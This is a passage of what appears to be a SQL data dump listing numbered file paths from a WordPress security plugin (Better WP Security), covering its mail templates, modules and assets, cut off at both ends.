ugins/better-wp-security/core/lib/mail-templates/details-box.html'),(1342,'wp-content/plugins/better-wp-security/core/lib/mail-templates/divider.html'),(1343,'wp-content/plugins/better-wp-security/core/lib/mail-templates/file-change-summary.html'),(1344,'wp-content/plugins/better-wp-security/core/lib/mail-templates/footer-user.html'),(1345,'wp-content/plugins/better-wp-security/core/lib/mail-templates/footer.html'),(1346,'wp-content/plugins/better-wp-security/core/lib/mail-templates/header.html'),(1347,'wp-content/plugins/better-wp-security/core/lib/mail-templates/image.html'),(1348,'wp-content/plugins/better-wp-security/core/lib/mail-templates/index.php'),(1349,'wp-content/plugins/better-wp-security/core/lib/mail-templates/info-box.html'),(1350,'wp-content/plugins/better-wp-security/core/lib/mail-templates/large-button.html'),(1351,'wp-content/plugins/better-wp-security/core/lib/mail-templates/large-code.html'),(1352,'wp-content/plugins/better-wp-security/core/lib/mail-templates/large-text.html'),(1353,'wp-content/plugins/better-wp-security/core/lib/mail-templates/list.html'),(1354,'wp-content/plugins/better-wp-security/core/lib/mail-templates/lockouts-entry.html'),(1355,'wp-content/plugins/better-wp-security/core/lib/mail-templates/lockouts-summary.html'),(1356,'wp-content/plugins/better-wp-security/core/lib/mail-templates/lockouts-table.html'),(1357,'wp-content/plugins/better-wp-security/core/lib/mail-templates/module-button.html'),(1358,'wp-content/plugins/better-wp-security/core/lib/mail-templates/pro-callout.html'),(1359,'wp-content/plugins/better-wp-security/core/lib/mail-templates/section-heading-with-icon.html'),(1360,'wp-content/plugins/better-wp-security/core/lib/mail-templates/section-heading.html'),(1361,'wp-content/plugins/better-wp-security/core/lib/mail-templates/small-code.html'),(1362,'wp-content/plugins/better-wp-security/core/lib/mail-templates/table.html'),(1363,'wp-content/plugins/better-wp-security/core/lib/mail-templates/text.html'),(1364,'wp-content/plugins/better-wp-security/core/lib/schema.php'),(1365,'wp-content/plugins/better-wp-security/core/lib/settings.php'),(1366,'wp-content/plugins/better-wp-security/core/lib/static-map-api/index.php'),(1367,'wp-content/plugins/better-wp-security/core/lib/static-map-api/interface-itsec-static-map-api.php'),(1368,'wp-content/plugins/better-wp-security/core/lib/storage.php'),(1369,'wp-content/plugins/better-wp-security/core/lib/validator.php'),(1370,'wp-content/plugins/better-wp-security/core/lib.php'),(1371,'wp-content/plugins/better-wp-security/core/lockout.php'),(1372,'wp-content/plugins/better-wp-security/core/modules/404-detection/active.php'),(1373,'wp-content/plugins/better-wp-security/core/modules/404-detection/class-itsec-four-oh-four.php'),(1374,'wp-content/plugins/better-wp-security/core/modules/404-detection/index.php'),(1375,'wp-content/plugins/better-wp-security/core/modules/404-detection/js/admin-four-oh-four.js'),(1376,'wp-content/plugins/better-wp-security/core/modules/404-detection/js/index.php'),(1377,'wp-content/plugins/better-wp-security/core/modules/404-detection/logs.php'),(1378,'wp-content/plugins/better-wp-security/core/modules/404-detection/settings-page.php'),(1379,'wp-content/plugins/better-wp-security/core/modules/404-detection/settings.php'),(1380,'wp-content/plugins/better-wp-security/core/modules/404-detection/setup.php'),(1381,'wp-content/plugins/better-wp-security/core/modules/404-detection/validator.php'),(1382,'wp-content/plugins/better-wp-security/core/modules/admin-user/active.php'),(1383,'wp-content/plugins/better-wp-security/core/modules/admin-user/index.php'),(1384,'wp-content/plugins/better-wp-security/core/modules/admin-user/js/admin-admin-user.js'),(1385,'wp-content/plugins/better-wp-security/core/modules/admin-user/js/index.php'),(1386,'wp-content/plugins/better-wp-security/core/modules/admin-user/settings-page.php'),(1387,'wp-content/plugins/better-wp-security/core/modules/admin-user/settings.php'),(1388,'wp-content/plugins/better-wp-security/core/modules/admin-user/validator.php'),(1389,'wp-content/plugins/better-wp-security/core/modules/away-mode/activate.php'),(1390,'wp-content/plugins/better-wp-security/core/modules/away-mode/active.php'),(1391,'wp-content/plugins/better-wp-security/core/modules/away-mode/class-itsec-away-mode.php'),(1392,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/index.php'),(1393,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-bg_glass_55_fbf9ee_1x400.png'),(1394,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-bg_glass_65_ffffff_1x400.png'),(1395,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-bg_glass_75_dadada_1x400.png'),(1396,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-bg_glass_75_e6e6e6_1x400.png'),(1397,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-bg_glass_95_fef1ec_1x400.png'),(1398,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-bg_highlight-soft_75_cccccc_1x100.png'),(1399,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-icons_222222_256x240.png'),(1400,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-icons_2e83ff_256x240.png'),(1401,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-icons_454545_256x240.png'),(1402,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-icons_888888_256x240.png'),(1403,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/images/ui-icons_cd0a0a_256x240.png'),(1404,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/index.php'),(1405,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/jquery-ui.min.css'),(1406,'wp-content/plugins/better-wp-security/core/modules/away-mode/css/jquery.datepicker.css'),(1407,'wp-content/plugins/better-wp-security/core/modules/away-mode/deactivate.php'),(1408,'wp-content/plugins/better-wp-security/core/modules/away-mode/index.php'),(1409,'wp-content/plugins/better-wp-security/core/modules/away-mode/js/admin-away-mode.js'),(1410,'wp-content/plugins/better-wp-security/core/modules/away-mode/js/index.php'),(1411,'wp-content/plugins/better-wp-security/core/modules/away-mode/js/settings-page.js'),(1412,'wp-content/plugins/better-wp-security/core/modules/away-mode/logs.php'),(1413,'wp-content/plugins/better-wp-security/core/modules/away-mode/settings-page.php'),(1414,'wp-content/plugins/better-wp-security/core/modules/away-mode/settings.php'),(1415,'wp-content/plugins/better-wp-security/core/modules/away-mode/setup.php'),(1416,'wp-content/plugins/better-wp-security/core/modules/away-mode/sync-verbs/index.php'),(1417,'wp-content/plugins/better-wp-security/core/modules/away-mode/sync-verbs/itsec-get-away-mode.php'),(1418,'wp-content/plugins/better-wp-security/core/modules/away-mode/sync-verbs/itsec-override-away-mode.php'),(1419,'wp-content/plugins/better-wp-security/core/modules/away-mode/utilities.php'),(1420,'wp-content/plugins/better-wp-security/core/modules/away-mode/validator.php'),(1421,'wp-content/plugins/better-wp-security/core/modules/backup/activate.php'),(1422,'wp-content/plugins/better-wp-security/core/modules/backup/active.php'),(1423,'wp-content/plugins/better-wp-security/core/modules/backup/class-itsec-backup.php'),(1424,'wp-content/plugins/better-wp-security/core/modules/backup/css/index.php'),(1425,'wp-content/plugins/better-wp-security/core/modules/backup/css/multi-select.css'),(1426,'wp-content/plugins/better-wp-security/core/modules/backup/css/settings-page.css'),(1427,'wp-content/plugins/better-wp-security/core/modules/backup/deactivate.php'),(1428,'wp-content/plugins/better-wp-security/core/modules/backup/img/index.php'),(1429,'wp-content/plugins/better-wp-security/core/modules/backup/img/switch.png'),(1430,'wp-content/plugins/better-wp-security/core/modules/backup/index.php'),(1431,'wp-content/plugins/better-wp-security/core/modules/backup/js/index.php'),(1432,'wp-content/plugins/better-wp-security/core/modules/backup/js/jquery.multi-select.js'),(1433,'wp-content/plugins/better-wp-security/core/modules/backup/js/settings-page.js'),(1434,'wp-content/plugins/better-wp-security/core/modules/backup/logs.php'),(1435,'wp-content/plugins/better-wp-security/core/modules/backup/privacy.php'),(1436,'wp-content/plugins/better-wp-security/core/modules/backup/settings-page.php'),(1437,'wp-content/plugins/better-wp-security/core/modules/backup/settings.php'),(1438,'wp-content/plugins/better-wp-security/core/modules/backup/setup.php'),(1439,'wp-content/plugins/better-wp-security/core/modules/backup/validator.php'),(1440,'wp-content/plugins/better-wp-security/core/modules/ban-users/activate.php'),(1441,'wp-content/plugins/better-wp-security/core/modules/ban-users/active.php'),(1442,'wp-content/plugins/better-wp-security/core/modules/ban-users/class-itsec-ban-users.php'),(1443,'wp-content/plugins/better-wp-security/core/modules/ban-users/config-generators.php'),(1444,'wp-content/plugins/better-wp-security/core/modules/ban-users/deactivate.php'),(1445,'wp-content/plugins/better-wp-security/core/modules/ban-users/index.php'),(1446,'wp-content/plugins/better-wp-security/core/modules/ban-users/init.php'),(1447,'wp-content/plugins/better-wp-security/core/modules/ban-users/js/admin-ban_users.js'),(1448,'wp-content/plugins/better-wp-security/core/modules/ban-users/js/index.php'),(1449,'wp-content/plugins/better-wp-security/core/modules/ban-users/lists/hackrepair-apache.inc'),(1450,'wp-content/plugins/better-wp-security/core/modules/ban-users/lists/hackrepair-litespeed.inc'),(1451,'wp-content/plugins/better-wp-security/core/modules/ban-users/lists/hackrepair-nginx.inc'),(1452,'wp-content/plugins/better-wp-security/core/modules/ban-users/lists/index.php'),(1453,'wp-content/plugins/better-wp-security/core/modules/ban-users/settings-page.php'),(1454,'wp-content/plugins/better-wp-security/core/modules/ban-users/settings.php'),(1455,'wp-content/plugins/better-wp-security/core/modules/ban-users/setup.php'),(1456,'wp-content/plugins/better-wp-security/core/modules/ban-users/validator.php'),(1457,'wp-content/plugins/better-wp-security/core/modules/brute-force/active.php'),(1458,'wp-content/plugins/better-wp-security/core/modules/brute-force/class-itsec-brute-force.php'),(1459,'wp-content/plugins/better-wp-security/core/modules/brute-force/index.php'),(1460,'wp-content/plugins/better-wp-security/core/modules/brute-force/js/admin-brute-force.js'),(1461,'wp-content/plugins/better-wp-security/core/modules/brute-force/js/index.php'),(1462,'wp-content/plugins/better-wp-security/core/modules/brute-force/logs.php'),(1463,'wp-content/plugins/better-wp-security/core/modules/brute-force/settings-page.php'),(1464,'wp-content/plugins/better-wp-security/core/modules/brute-force/settings.php'),(1465,'wp-content/plugins/better-wp-security/core/modules/brute-force/setup.php'),(1466,'wp-content/plugins/better-wp-security/core/modules/brute-force/validator.php'),(1467,'wp-content/plugins/better-wp-security/core/modules/content-directory/index.php'),(1468,'wp-content/plugins/better-wp-security/core/modules/content-directory/settings-page.php'),(1469,'wp-content/plugins/better-wp-security/core/modules/content-directory/utility.php'),(1470,'wp-content/plugins/better-wp-security/core/modules/core/active.php'),(1471,'wp-content/plugins/better-wp-security/core/modules/core/class-itsec-admin-notices.php'),(1472,'wp-content/plugins/better-wp-security/core/modules/core/class-itsec-core-active.php'),(1473,'wp-content/plugins/better-wp-security/core/modules/core/class-itsec-core-admin.php'),(1474,'wp-content/plugins/better-wp-security/core/modules/core/class-rest-core-admin-notices-controller.php'),(1475,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/app.js'),(1476,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/admin-bar/index.js'),(1477,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/admin-bar/index.php'),(1478,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/admin-bar/style.scss'),(1479,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/index.php'),(1480,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice/index.js'),(1481,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice/index.php'),(1482,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice/style.scss'),(1483,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice-actions/index.js'),(1484,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice-actions/index.php'),(1485,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice-actions/style.scss'),(1486,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice-list/index.js'),(1487,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice-list/index.php'),(1488,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/notice-list/style.scss'),(1489,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/panel/index.js'),(1490,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/panel/index.php'),(1491,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/panel/style.scss'),(1492,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/toolbar/index.js'),(1493,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/toolbar/index.php'),(1494,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/components/toolbar/style.scss'),(1495,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/index.php'),(1496,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/actions.js'),(1497,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/controls.js'),(1498,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/index.js'),(1499,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/index.php'),(1500,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/reducers.js'),(1501,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/resolvers.js'),(1502,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/store/selectors.js'),(1503,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/style.scss'),(1504,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices/utils.js'),(1505,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices-api.js'),(1506,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices-dashboard-admin-bar.js'),(1507,'wp-content/plugins/better-wp-security/core/modules/core/entries/admin-notices.js'),(1508,'wp-content/plugins/better-wp-security/core/modules/core/entries/index.php'),(1509,'wp-content/plugins/better-wp-security/core/modules/core/img/backupbuddy-logo.png'),(1510,'wp-content/plugins/better-wp-security/core/modules/core/img/index.php'),(1511,'wp-content/plugins/better-wp-security/core/modules/core/img/security-ebook.png'),(1512,'wp-content/plugins/better-wp-security/core/modules/core/img/sync-logo.png'),(1513,'wp-content/plugins/better-wp-security/core/modules/core/img/video.png'),(1514,'wp-content/plugins/better-wp-security/core/modules/core/index.php'),(1515,'wp-content/plugins/better-wp-security/core/modules/core/js/admin-notices.js'),(1516,'wp-content/plugins/better-wp-security/core/modules/core/js/index.php'),(1517,'wp-content/plugins/better-wp-security/core/modules/core/js/mc-validate.js'),(1518,'wp-content/plugins/better-wp-security/core/modules/core/sidebar-widget-backupbuddy-cross-promo.php'),(1519,'wp-content/plugins/better-wp-security/core/modules/core/sidebar-widget-mail-list-signup.php'),(1520,'wp-content/plugins/better-wp-security/core/modules/core/sidebar-widget-pro-upsell.php'),(1521,'wp-content/plugins/better-wp-security/core/modules/core/sidebar-widget-support.php'),(1522,'wp-content/plugins/better-wp-security/core/modules/core/sidebar-widget-sync-cross-promo.php'),(1523,'wp-content/plugins/better-wp-security/core/modules/database-prefix/index.php'),(1524,'wp-content/plugins/better-wp-security/core/modules/database-prefix/settings-page.php'),(1525,'wp-content/plugins/better-wp-security/core/modules/database-prefix/utility.php'),(1526,'wp-content/plugins/better-wp-security/core/modules/feature-flags/index.php'),(1527,'wp-content/plugins/better-wp-security/core/modules/feature-flags/settings-page.php'),(1528,'wp-content/plugins/better-wp-security/core/modules/file-change/activate.php'),(1529,'wp-content/plugins/better-wp-security/core/modules/file-change/active.php'),(1530,'wp-content/plugins/better-wp-security/core/modules/file-change/admin.php'),(1531,'wp-content/plugins/better-wp-security/core/modules/file-change/class-itsec-file-change.php'),(1532,'wp-content/plugins/better-wp-security/core/modules/file-change/css/index.php'),(1533,'wp-content/plugins/better-wp-security/core/modules/file-change/css/settings.css'),(1534,'wp-content/plugins/better-wp-security/core/modules/file-change/deactivate.php'),(1535,'wp-content/plugins/better-wp-security/core/modules/file-change/images/index.php'),(1536,'wp-content/plugins/better-wp-security/core/modules/file-change/images/redminus.png'),(1537,'wp-content/plugins/better-wp-security/core/modules/file-change/index.php'),(1538,'wp-content/plugins/better-wp-security/core/modules/file-change/js/admin-file-change-warning.js'),(1539,'wp-content/plugins/better-wp-security/core/modules/file-change/js/file-scanner.js'),(1540,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/application.png'),(1541,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/code.png'),(1542,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/css.png'),(1543,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/db.png'),(1544,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/directory.png'),(1545,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/doc.png'),(1546,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/file.png'),(1547,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/film.png'),(1548,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/flash.png'),(1549,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/folder_open.png'),(1550,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/html.png'),(1551,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/index.php'),(1552,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/java.png'),(1553,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/linux.png'),(1554,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/music.png'),(1555,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/pdf.png'),(1556,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/php.png'),(1557,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/picture.png'),(1558,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/ppt.png'),(1559,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/psd.png'),(1560,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/ruby.png'),(1561,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/script.png'),(1562,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/spinner.gif'),(1563,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/txt.png'),(1564,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/xls.png'),(1565,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/images/zip.png'),(1566,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/index.php'),(1567,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/jqueryFileTree.css'),(1568,'wp-content/plugins/better-wp-security/core/modules/file-change/js/filetree/jqueryFileTree.js'),(1569,'wp-content/plugins/better-wp-security/core/modules/file-change/js/index.php'),(1570,'wp-content/plugins/better-wp-security/core/modules/file-change/js/settings-page.js'),(1571,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/chunk-scanner.php'),(1572,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/hash-comparator-chain.php'),(1573,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/hash-comparator-loadable.php'),(1574,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/hash-comparator-managed-files.php'),(1575,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/hash-comparator.php'),(1576,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/hash-loading-failed-exception.php'),(1577,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/index.php'),(1578,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package-core.php'),(1579,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package-factory.php'),(1580,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package-plugin.php'),(1581,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package-system.php'),(1582,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package-theme.php'),(1583,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package-unknown.php'),(1584,'wp-content/plugins/better-wp-security/core/modules/file-change/lib/package.php'),(1585,'wp-content/plugins/better-wp-security/core/modules/file-change/logs.php'),(1586,'wp-content/plugins/better-wp-security/core/modules/file-change/scanner.php'),(1587,'wp-content/plugins/better-wp-security/core/modules/file-change/settings-page.php'),(1588,'wp-content/plugins/better-wp-security/core/modules/file-change/settings.php'),(1589,'wp-content/plugins/better-wp-security/core/modules/file-change/setup.php'),(1590,'wp-content/plugins/better-wp-security/core/modules/file-change/sync-verbs/index.php'),(1591,'wp-content/plugins/better-wp-security/core/modules/file-change/sync-verbs/itsec-latest-file-scan.php'),(1592,'wp-content/plugins/better-wp-security/core/modules/file-change/validator.php'),(1593,'wp-content/plugins/better-wp-security/core/modules/file-permissions/index.php'),(1594,'wp-content/plugins/better-wp-security/core/modules/file-permissions/settings-page.php'),(1595,'wp-content/plugins/better-wp-security/core/modules/file-writing/index.php'),(1596,'wp-content/plugins/better-wp-security/core/modules/file-writing/settings-page.php'),(1597,'wp-content/plugins/better-wp-security/core/modules/file-writing/setup.php'),(1598,'wp-content/plugins/better-wp-security/core/modules/global/active.php'),(1599,'wp-content/plugins/better-wp-security/core/modules/global/index.php'),(1600,'wp-content/plugins/better-wp-security/core/modules/global/js/index.php'),(1601,'wp-content/plugins/better-wp-security/core/modules/global/js/settings-page.js'),(1602,'wp-content/plugins/better-wp-security/core/modules/global/logs.php'),(1603,'wp-content/plugins/better-wp-security/core/modules/global/notices.php'),(1604,'wp-content/plugins/better-wp-security/core/modules/global/privacy.php'),(1605,'wp-content/plugins/better-wp-security/core/modules/global/settings-page.php'),(1606,'wp-content/plugins/better-wp-security/core/modules/global/settings.php'),(1607,'wp-content/plugins/better-wp-security/core/modules/global/setup.php'),(1608,'wp-content/plugins/better-wp-security/core/modules/global/validator.php'),(1609,'wp-content/plugins/better-wp-security/core/modules/hide-backend/active.php'),(1610,'wp-content/plugins/better-wp-security/core/modules/hide-backend/class-itsec-hide-backend.php'),(1611,'wp-content/plugins/better-wp-security/core/modules/hide-backend/css/index.php'),(1612,'wp-content/plugins/better-wp-security/core/modules/hide-backend/css/login-page.css'),(1613,'wp-content/plugins/better-wp-security/core/modules/hide-backend/index.php'),(1614,'wp-content/plugins/better-wp-security/core/modules/hide-backend/js/index.php'),(1615,'wp-content/plugins/better-wp-security/core/modules/hide-backend/js/settings-page.js'),(1616,'wp-content/plugins/better-wp-security/core/modules/hide-backend/privacy.php'),(1617,'wp-content/plugins/better-wp-security/core/modules/hide-backend/settings-page.php'),(1618,'wp-content/plugins/better-wp-security/core/modules/hide-backend/settings.php'),(1619,'wp-content/plugins/better-wp-security/core/modules/hide-backend/setup.php'),(1620,'wp-content/plugins/better-wp-security/core/modules/hide-backend/validator.php'),(1621,'wp-content/plugins/better-wp-security/core/modules/index.php'),(1622,'wp-content/plugins/better-wp-security/core/modules/ipcheck/active.php'),(1623,'wp-content/plugins/better-wp-security/core/modules/ipcheck/class-itsec-ipcheck.php'),(1624,'wp-content/plugins/better-wp-security/core/modules/ipcheck/index.php'),(1625,'wp-content/plugins/better-wp-security/core/modules/ipcheck/js/index.php'),(1626,'wp-content/plugins/better-wp-security/core/modules/ipcheck/js/settings-page.js'),(1627,'wp-content/plugins/better-wp-security/core/modules/ipcheck/logs.php'),(1628,'wp-content/plugins/better-wp-security/core/modules/ipcheck/privacy.php'),(1629,'wp-content/plugins/better-wp-security/core/modules/ipcheck/settings-page.php'),(1630,'wp-content/plugins/better-wp-security/core/modules/ipcheck/settings.php'),(1631,'wp-content/plugins/better-wp-security/core/modules/ipcheck/setup.php'),(1632,'wp-content/plugins/better-wp-security/core/modules/ipcheck/utilities.php'),(1633,'wp-content/plugins/better-wp-security/core/modules/ipcheck/validator.php'),(1634,'wp-content/plugins/better-wp-security/core/modules/malware/active.php'),(1635,'wp-content/plugins/better-wp-security/core/modules/malware/class-itsec-malware-scan-results-template.php'),(1636,'wp-content/plugins/better-wp-security/core/modules/malware/class-itsec-malware-scanner.php'),(1637,'wp-content/plugins/better-wp-security/core/modules/malware/class-itsec-malware.php'),(1638,'wp-content/plugins/better-wp-security/core/modules/malware/css/index.php'),(1639,'wp-content/plugins/better-wp-security/core/modules/malware/css/malware.css'),(1640,'wp-content/plugins/better-wp-security/core/modules/malware/css/settings.css'),(1641,'wp-content/plugins/better-wp-security/core/modules/malware/index.php'),(1642,'wp-content/plugins/better-wp-security/core/modules/malware/js/index.php'),(1643,'wp-content/plugins/better-wp-security/core/modules/malware/js/malware.js'),(1644,'wp-content/plugins/better-wp-security/core/modules/malware/js/settings-page.js'),(1645,'wp-content/plugins/better-wp-security/core/modules/malware/logs.php'),(1646,'wp-content/plugins/better-wp-security/core/modules/malware/privacy.php'),(1647,'wp-content/plugins/better-wp-security/core/modules/malware/settings-page.php'),(1648,'wp-content/plugins/better-wp-security/core/modules/malware/setup.php'),(1649,'wp-content/plugins/better-wp-security/core/modules/malware/sync-verbs/index.php'),(1650,'wp-content/plugins/better-wp-security/core/modules/malware/sync-verbs/itsec-do-malware-scan.php'),(1651,'wp-content/plugins/better-wp-security/core/modules/malware/sync-verbs/itsec-get-malware-scan-log.php'),(1652,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/active.php'),(1653,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/class-itsec-multisite-tweaks.php'),(1654,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/index.php'),(1655,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/settings-page.php'),(1656,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/settings.php'),(1657,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/setup.php'),(1658,'wp-content/plugins/better-wp-security/core/modules/multisite-tweaks/validator.php'),(1659,'wp-content/plugins/better-wp-security/core/modules/notification-center/active.php'),(1660,'wp-content/plugins/better-wp-security/core/modules/notification-center/class-notification-center.php'),(1661,'wp-content/plugins/better-wp-security/core/modules/notification-center/css/index.php'),(1662,'wp-content/plugins/better-wp-security/core/modules/notification-center/css/settings-page.css'),(1663,'wp-content/plugins/better-wp-security/core/modules/notification-center/debug.php'),(1664,'wp-content/plugins/better-wp-security/core/modules/notification-center/index.php'),(1665,'wp-content/plugins/better-wp-security/core/modules/notification-center/js/debug.js'),(1666,'wp-content/plugins/better-wp-security/core/modules/notification-center/js/index.php'),(1667,'wp-content/plugins/better-wp-security/core/modules/notification-center/js/settings-page.js'),(1668,'wp-content/plugins/better-wp-security/core/modules/notification-center/logs.php'),(1669,'wp-content/plugins/better-wp-security/core/modules/notification-center/settings-page.php'),(1670,'wp-content/plugins/better-wp-security/core/modules/notification-center/settings.php'),(1671,'wp-content/plugins/better-wp-security/core/modules/notification-center/setup.php'),(1672,'wp-content/plugins/better-wp-security/core/modules/notification-center/validator.php'),(1673,'wp-content/plugins/better-wp-security/core/modules/password-requirements/active.php'),(1674,'wp-content/plugins/better-wp-security/core/modules/password-requirements/class-itsec-password-requirements.php'),(1675,'wp-content/plugins/better-wp-security/core/modules/password-requirements/css/index.php'),(1676,'wp-content/plugins/better-wp-security/core/modules/password-requirements/css/settings-page.css'),(1677,'wp-content/plugins/better-wp-security/core/modules/password-requirements/index.php'),(1678,'wp-content/plugins/better-wp-security/core/modules/password-requirements/js/index.php'),(1679,'wp-content/plugins/better-wp-security/core/modules/password-requirements/js/settings-page.js'),(1680,'wp-content/plugins/better-wp-security/core/modules/password-requirements/settings-page.php'),(1681,'wp-content/plugins/better-wp-security/core/modules/password-requirements/settings.php'),(1682,'wp-content/plugins/better-wp-security/core/modules/password-requirements/validator.php'),(1683,'wp-content/plugins/better-wp-security/core/modules/privacy/active.php'),(1684,'wp-content/plugins/better-wp-security/core/modules/privacy/class-itsec-privacy.php'),(1685,'wp-content/plugins/better-wp-security/core/modules/privacy/index.php'),(1686,'wp-content/plugins/better-wp-security/core/modules/privacy/util.php'),(1687,'wp-content/plugins/better-wp-security/core/modules/pro/index.php'),(1688,'wp-content/plugins/better-wp-security/core/modules/pro/settings-page.php'),(1689,'wp-content/plugins/better-wp-security/core/modules/pro/setup.php'),(1690,'wp-content/plugins/better-wp-security/core/modules/salts/active.php'),(1691,'wp-content/plugins/better-wp-security/core/modules/salts/index.php'),(1692,'wp-content/plugins/better-wp-security/core/modules/salts/settings-page.php'),(1693,'wp-content/plugins/better-wp-security/core/modules/salts/settings.php'),(1694,'wp-content/plugins/better-wp-security/core/modules/salts/setup.php'),(1695,'wp-content/plugins/better-wp-security/core/modules/salts/utilities.php'),(1696,'wp-content/plugins/better-wp-security/core/modules/salts/validator.php'),(1697,'wp-content/plugins/better-wp-security/core/modules/security-check/active.php'),(1698,'wp-content/plugins/better-wp-security/core/modules/security-check/feedback-renderer.php'),(1699,'wp-content/plugins/better-wp-security/core/modules/security-check/feedback.php'),(1700,'wp-content/plugins/better-wp-security/core/modules/security-check/index.php'),(1701,'wp-content/plugins/better-wp-security/core/modules/security-check/js/index.php'),(1702,'wp-content/plugins/better-wp-security/core/modules/security-check/js/settings-page.js'),(1703,'wp-content/plugins/better-wp-security/core/modules/security-check/scanner.php'),(1704,'wp-content/plugins/better-wp-security/core/modules/security-check/settings-page.php'),(1705,'wp-content/plugins/better-wp-security/core/modules/security-check/sync-verbs/index.php'),(1706,'wp-content/plugins/better-wp-security/core/modules/security-check/sync-verbs/itsec-do-security-check.php'),(1707,'wp-content/plugins/better-wp-security/core/modules/security-check/sync-verbs/itsec-get-security-check-feedback-response.php'),(1708,'wp-content/plugins/better-wp-security/core/modules/security-check/sync-verbs/itsec-get-security-check-modules.php'),(1709,'wp-content/plugins/better-wp-security/core/modules/ssl/activate.php'),(1710,'wp-content/plugins/better-w